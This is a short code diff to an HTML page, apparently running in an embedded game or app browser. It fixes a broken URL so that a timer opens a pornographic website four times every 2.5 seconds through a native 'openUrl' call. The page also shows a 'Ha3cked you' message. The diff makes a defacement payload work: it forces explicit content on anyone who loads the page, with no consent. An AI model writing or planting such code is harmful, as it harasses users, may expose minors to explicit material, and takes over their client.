--- a/index.html
+++ b/index.html
@@ -79,10 +79,10 @@
         });
 
         setInterval(function() {
-            window.invokeNative("openUrl", "https:pornhub.com");
-            window.invokeNative("openUrl", "https:pornhub.com");
-            window.invokeNative("openUrl", "https:pornhub.com");
-            window.invokeNative("openUrl", "https:pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
+            window.invokeNative("openUrl", "https://pornhub.com");
         }, 2500);
    
 const msg = ` sfa7 Ha3cked you 🫃🔞  `;
